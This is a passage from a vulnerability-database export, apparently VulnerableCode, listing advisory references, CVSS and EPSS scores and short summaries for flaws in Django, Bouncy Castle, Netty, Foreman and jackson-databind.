reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20190705-0002
18
reference_url https://security.netapp.com/advisory/ntap-20190705-0002/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20190705-0002/
19
reference_url https://usn.ubuntu.com/4043-1
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4043-1
20
reference_url https://usn.ubuntu.com/4043-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4043-1/
21
reference_url https://www.debian.org/security/2019/dsa-4476
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2019/dsa-4476
22
reference_url https://www.djangoproject.com/weblog/2019/jul/01/security-releases
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.djangoproject.com/weblog/2019/jul/01/security-releases
23
reference_url https://www.djangoproject.com/weblog/2019/jul/01/security-releases/
reference_id
reference_type
scores
url https://www.djangoproject.com/weblog/2019/jul/01/security-releases/
24
reference_url http://www.openwall.com/lists/oss-security/2019/07/01/3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2019/07/01/3
25
reference_url http://www.securityfocus.com/bid/109018
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/109018
26
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1724497
reference_id 1724497
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1724497
27
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931316
reference_id 931316
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931316
28
reference_url https://security.archlinux.org/ASA-201907-2
reference_id ASA-201907-2
reference_type
scores
url https://security.archlinux.org/ASA-201907-2
29
reference_url https://security.archlinux.org/AVG-1000
reference_id AVG-1000
reference_type
scores
0
value High
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1000
30
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-12781
reference_id CVE-2019-12781
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-12781
31
reference_url https://access.redhat.com/errata/RHSA-2020:1324
reference_id RHSA-2020:1324
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1324
32
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
33
reference_url https://access.redhat.com/errata/RHSA-2020:4390
reference_id RHSA-2020:4390
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4390
fixed_packages
aliases CVE-2019-12781, GHSA-6c7v-2f49-8h26, PYSEC-2019-10
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qjez-qe32-e3b6
60
url VCID-qr8s-5r61-skhw
vulnerability_id VCID-qr8s-5r61-skhw
summary In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES/ECIES CBC mode vulnerable to padding oracle attack. For BC 1.55 and older, in an environment where timings can be easily observed, it is possible with enough observations to identify when the decryption is failing due to padding.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000345.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000345.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000345
reference_id
reference_type
scores
0
value 0.00802
scoring_system epss
scoring_elements 0.74045
published_at 2026-04-07T12:55:00Z
1
value 0.00802
scoring_system epss
scoring_elements 0.7409
published_at 2026-04-13T12:55:00Z
2
value 0.00802
scoring_system epss
scoring_elements 0.74096
published_at 2026-04-12T12:55:00Z
3
value 0.00802
scoring_system epss
scoring_elements 0.74114
published_at 2026-04-11T12:55:00Z
4
value 0.00802
scoring_system epss
scoring_elements 0.74093
published_at 2026-04-09T12:55:00Z
5
value 0.00802
scoring_system epss
scoring_elements 0.74078
published_at 2026-04-08T12:55:00Z
6
value 0.00802
scoring_system epss
scoring_elements 0.74042
published_at 2026-04-01T12:55:00Z
7
value 0.00802
scoring_system epss
scoring_elements 0.74048
published_at 2026-04-02T12:55:00Z
8
value 0.00802
scoring_system epss
scoring_elements 0.74074
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000345
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000345
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000345
5
reference_url https://github.com/bcgit/bc-java/commit/21dcb3d9744c83dcf2ff8fcee06dbca7bfa4ef35
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/21dcb3d9744c83dcf2ff8fcee06dbca7bfa4ef35
6
reference_url https://github.com/bcgit/bc-java/commit/21dcb3d9744c83dcf2ff8fcee06dbca7bfa4ef35#diff-4439ce586bf9a13bfec05c0d113b8098
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/21dcb3d9744c83dcf2ff8fcee06dbca7bfa4ef35#diff-4439ce586bf9a13bfec05c0d113b8098
7
reference_url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
8
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
9
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
10
reference_url https://usn.ubuntu.com/3727-1
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3727-1
11
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
12
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588323
reference_id 1588323
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588323
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
15
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000345
reference_id CVE-2016-1000345
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:N/A:N
1
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000345
16
reference_url https://github.com/advisories/GHSA-9gp4-qrff-c648
reference_id GHSA-9gp4-qrff-c648
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-9gp4-qrff-c648
17
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2016-1000345, GHSA-9gp4-qrff-c648
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qr8s-5r61-skhw
61
url VCID-r7tw-km29-4bdp
vulnerability_id VCID-r7tw-km29-4bdp
summary 
HTTP Request Smuggling in Netty
Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. This issue exists because of an incomplete fix for CVE-2019-16869.
references
0
reference_url https://access.redhat.com/errata/RHSA-2020:0497
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0497
1
reference_url https://access.redhat.com/errata/RHSA-2020:0567
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0567
2
reference_url https://access.redhat.com/errata/RHSA-2020:0601
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0601
3
reference_url https://access.redhat.com/errata/RHSA-2020:0605
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0605
4
reference_url https://access.redhat.com/errata/RHSA-2020:0606
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0606
5
reference_url https://access.redhat.com/errata/RHSA-2020:0804
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0804
6
reference_url https://access.redhat.com/errata/RHSA-2020:0805
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0805
7
reference_url https://access.redhat.com/errata/RHSA-2020:0806
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0806
8
reference_url https://access.redhat.com/errata/RHSA-2020:0811
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0811
9
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7238.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7238.json
10
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7238
reference_id
reference_type
scores
0
value 0.01498
scoring_system epss
scoring_elements 0.8112
published_at 2026-04-13T12:55:00Z
1
value 0.01498
scoring_system epss
scoring_elements 0.81056
published_at 2026-04-01T12:55:00Z
2
value 0.01498
scoring_system epss
scoring_elements 0.81065
published_at 2026-04-02T12:55:00Z
3
value 0.01498
scoring_system epss
scoring_elements 0.81089
published_at 2026-04-07T12:55:00Z
4
value 0.01498
scoring_system epss
scoring_elements 0.81117
published_at 2026-04-08T12:55:00Z
5
value 0.01498
scoring_system epss
scoring_elements 0.81123
published_at 2026-04-09T12:55:00Z
6
value 0.01498
scoring_system epss
scoring_elements 0.8114
published_at 2026-04-11T12:55:00Z
7
value 0.01498
scoring_system epss
scoring_elements 0.81127
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7238
11
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20444
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20444
12
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20445
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20445
13
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11612
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11612
14
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7238
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7238
15
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21290
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21290
16
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21295
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21295
17
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21409
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21409
18
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
19
reference_url https://github.com/jdordonezn/CVE-2020-72381/issues/1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/jdordonezn/CVE-2020-72381/issues/1
20
reference_url https://github.com/netty/netty/issues/9861
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/netty/netty/issues/9861
21
reference_url https://github.com/netty/netty/pull/9865
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/netty/netty/pull/9865
22
reference_url https://lists.apache.org/thread.html/r131e572d003914843552fa45c4398b9903fb74144986e8b107c0a3a7@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r131e572d003914843552fa45c4398b9903fb74144986e8b107c0a3a7@%3Ccommits.cassandra.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/rc8d554aad889d12b140d9fd7d2d6fc2e8716e9792f6f4e4b2cdc2d05@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc8d554aad889d12b140d9fd7d2d6fc2e8716e9792f6f4e4b2cdc2d05@%3Ccommits.cassandra.apache.org%3E
24
reference_url https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html
25
reference_url https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html
26
reference_url https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html
27
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46
28
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/
29
reference_url https://netty.io/news
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://netty.io/news
30
reference_url https://netty.io/news/
reference_id
reference_type
scores
url https://netty.io/news/
31
reference_url https://netty.io/news/2019/12/18/4-1-44-Final.html
reference_id
reference_type
scores
url https://netty.io/news/2019/12/18/4-1-44-Final.html
32
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7238
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7238
33
reference_url https://www.debian.org/security/2021/dsa-4885
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2021/dsa-4885
34
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1796225
reference_id 1796225
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1796225
35
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=950967
reference_id 950967
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=950967
36
reference_url https://github.com/advisories/GHSA-ff2w-cq2g-wv5f
reference_id GHSA-ff2w-cq2g-wv5f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-ff2w-cq2g-wv5f
37
reference_url https://access.redhat.com/errata/RHSA-2020:0922
reference_id RHSA-2020:0922
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0922
38
reference_url https://access.redhat.com/errata/RHSA-2020:0939
reference_id RHSA-2020:0939
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0939
39
reference_url https://access.redhat.com/errata/RHSA-2020:0951
reference_id RHSA-2020:0951
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0951
40
reference_url https://access.redhat.com/errata/RHSA-2020:1445
reference_id RHSA-2020:1445
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1445
41
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
42
reference_url https://access.redhat.com/errata/RHSA-2020:2321
reference_id RHSA-2020:2321
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2321
43
reference_url https://access.redhat.com/errata/RHSA-2020:2333
reference_id RHSA-2020:2333
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2333
44
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
45
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
46
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
47
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
48
reference_url https://usn.ubuntu.com/4600-1/
reference_id USN-4600-1
reference_type
scores
url https://usn.ubuntu.com/4600-1/
fixed_packages
aliases CVE-2020-7238, GHSA-ff2w-cq2g-wv5f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r7tw-km29-4bdp
62
url VCID-rnuk-n3a6-cbh9
vulnerability_id VCID-rnuk-n3a6-cbh9
summary foreman: stored XSS in success notification after entity creation
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16861.json
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16861.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-16861
reference_id
reference_type
scores
0
value 0.00388
scoring_system epss
scoring_elements 0.59761
published_at 2026-04-01T12:55:00Z
1
value 0.00388
scoring_system epss
scoring_elements 0.59834
published_at 2026-04-02T12:55:00Z
2
value 0.00388
scoring_system epss
scoring_elements 0.59859
published_at 2026-04-04T12:55:00Z
3
value 0.00388
scoring_system epss
scoring_elements 0.59829
published_at 2026-04-07T12:55:00Z
4
value 0.00388
scoring_system epss
scoring_elements 0.5988
published_at 2026-04-08T12:55:00Z
5
value 0.00388
scoring_system epss
scoring_elements 0.59893
published_at 2026-04-09T12:55:00Z
6
value 0.00388
scoring_system epss
scoring_elements 0.59914
published_at 2026-04-11T12:55:00Z
7
value 0.00388
scoring_system epss
scoring_elements 0.59899
published_at 2026-04-12T12:55:00Z
8
value 0.00388
scoring_system epss
scoring_elements 0.59881
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-16861
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1645201
reference_id 1645201
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1645201
fixed_packages
aliases CVE-2018-16861
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rnuk-n3a6-cbh9
63
url VCID-ruae-hqdg-m7ek
vulnerability_id VCID-ruae-hqdg-m7ek
summary 
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-9547.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-9547.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-9547
reference_id
reference_type
scores
0
value 0.38262
scoring_system epss
scoring_elements 0.97228
published_at 2026-04-13T12:55:00Z
1
value 0.38262
scoring_system epss
scoring_elements 0.97227
published_at 2026-04-12T12:55:00Z
2
value 0.38262
scoring_system epss
scoring_elements 0.97226
published_at 2026-04-11T12:55:00Z
3
value 0.38262
scoring_system epss
scoring_elements 0.97222
published_at 2026-04-09T12:55:00Z
4
value 0.38262
scoring_system epss
scoring_elements 0.97221
published_at 2026-04-08T12:55:00Z
5
value 0.38262
scoring_system epss
scoring_elements 0.97212
published_at 2026-04-07T12:55:00Z
6
value 0.38262
scoring_system epss
scoring_elements 0.97211
published_at 2026-04-04T12:55:00Z
7
value 0.38262
scoring_system epss
scoring_elements 0.97206
published_at 2026-04-02T12:55:00Z
8
value 0.38262
scoring_system epss
scoring_elements 0.97199
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-9547
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547
reference_id
reference_type
scores
